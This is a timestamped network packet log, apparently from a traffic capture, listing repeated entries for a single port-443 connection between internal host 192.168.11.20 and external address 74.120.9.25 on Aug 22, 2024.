Aug 22, 2024 16:13:36.702462912 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.702666998 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.713382006 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.713582039 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.719760895 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.719926119 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.725636959 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.725775957 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.725824118 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.743098021 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.743422031 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.743422031 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.743431091 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.743567944 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.756136894 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.756320953 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.756330013 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.756479979 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.767887115 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.768224001 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.768224001 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.768233061 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.768415928 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.781271935 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.781595945 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.781595945 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.781605005 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.781795025 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.791974068 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.792103052 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.792155027 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.792159081 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.792320967 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.804186106 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.804394960 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.804394960 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.814201117 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.814410925 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.814418077 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.814625978 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.828711033 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.828855038 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.828906059 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.839095116 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.839255095 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.849678040 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.849875927 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.849883080 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.850090981 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.859886885 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.860224009 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.860230923 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.860369921 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.868562937 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.868700027 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.868747950 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.868752956 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.868913889 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.886651039 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.886888027 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.897753000 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.897927999 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.898093939 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.898097992 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.898262978 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.907927990 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.908252001 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.908252001 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.913685083 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.913902044 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.920818090 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.921045065 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.921055079 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.921343088 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.932374954 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.932698965 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.932698965 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.938745975 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.938879967 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.944108963 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.944245100 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.944245100 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.944293022 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.944298029 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.944459915 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.957695961 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.957923889 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.975956917 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.976120949 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.976121902 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.976130962 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.976336002 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.985857964 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.986181974 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.986188889 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.986392975 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.996850014 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.997173071 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.997179985 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.997337103 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.005278111 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.005436897 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.005664110 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.015861034 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.016047001 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.029099941 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.029239893 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.029239893 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.029288054 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.029293060 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.029453993 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.039343119 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.039510012 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.039707899 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.044261932 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.044595003 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.044601917 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.044742107 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.057104111 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.057427883 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.057427883 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.057436943 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.057574034 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.068681002 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.068936110 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.068943977 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.069102049 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.079149008 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.079291105 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.079339027 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.084775925 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.084959030 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.087316990 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.087584019 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.094054937 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.094279051 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.104475975 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.104732990 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.104732990 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.116195917 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.116406918 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.116406918 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.116415977 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.116571903 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.130321980 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.130472898 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.130521059 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.132968903 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.133208036 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.138694048 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.138858080 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.139106989 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.144532919 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.144706011 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.159529924 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.159852982 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.159852982 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.159862995 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.160064936 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.170816898 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.171073914 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.171082020 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.171402931 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.179336071 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.179733038 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.190310001 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.190450907 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.190615892 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.190620899 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.190782070 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.201376915 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.201592922 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.201601028 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.201759100 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.212769032 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.213028908 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.213195086 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.213200092 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.213349104 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.225883961 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.226051092 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.226061106 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.226264954 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.238998890 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.239293098 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.239303112 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.239552021 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.248449087 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.249722004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.259988070 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.260333061 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.260333061 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.260392904 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.260556936 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.269870996 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.270167112 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.270220995 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.270385027 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.281809092 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.282074928 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.282130003 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.282324076 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.289037943 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.289233923 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.289273977 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.289294958 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.289475918 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.303260088 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.303446054 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.303466082 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.307252884 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.307485104 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.314035892 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.314294100 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.314294100 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.321572065 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.321769953 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.321796894 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.326736927 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.326996088 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.337706089 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.337872028 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.337938070 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.337945938 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.338159084 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.350265026 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.350445986 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.350445986 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.350457907 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.350637913 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.357743979 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.357988119 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.357997894 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.358201981 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.367779016 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.367979050 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.367979050 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.375725985 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.375942945 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.377906084 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.378074884 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.378074884 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.389096975 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.389218092 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.389481068 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.393086910 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.393285036 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.399066925 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.399225950 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.399275064 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.399280071 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.399441004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.414736986 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.414906025 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.414906025 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.414916039 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.415118933 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.421185970 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.421315908 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.421420097 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.421432972 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.421638966 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.433408022 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.433646917 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.433646917 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.439677954 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.439867020 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.444062948 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.444236040 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.444236040 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.453444004 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.453582048 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.453583002 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.453630924 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.457879066 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.458046913 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.468962908 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.469124079 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.469214916 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.469280005 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.469433069 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.479779959 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.479916096 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.479967117 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.480048895 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.480206013 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.487880945 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.488066912 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.488068104 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.488246918 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.488404036 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.496824980 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.496977091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.496977091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.497270107 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.501476049 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.501698017 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.504287004 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.504456997 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.504456997 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.515019894 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.515232086 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.515232086 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.515254021 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.515443087 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.525624990 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.525774956 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.525774956 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.525823116 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.530412912 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.530550003 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.536130905 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.536333084 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.536349058 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.536529064 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.545260906 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.545432091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.545478106 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.551163912 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.551321030 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.558973074 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.559322119 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.559334993 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.559494972 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.570719004 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.570930004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.570930004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.580662012 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.580910921 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.580933094 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.581124067 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.589890957 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.590193033 CEST	49794	443	192.168.11.20	74.120.9.25
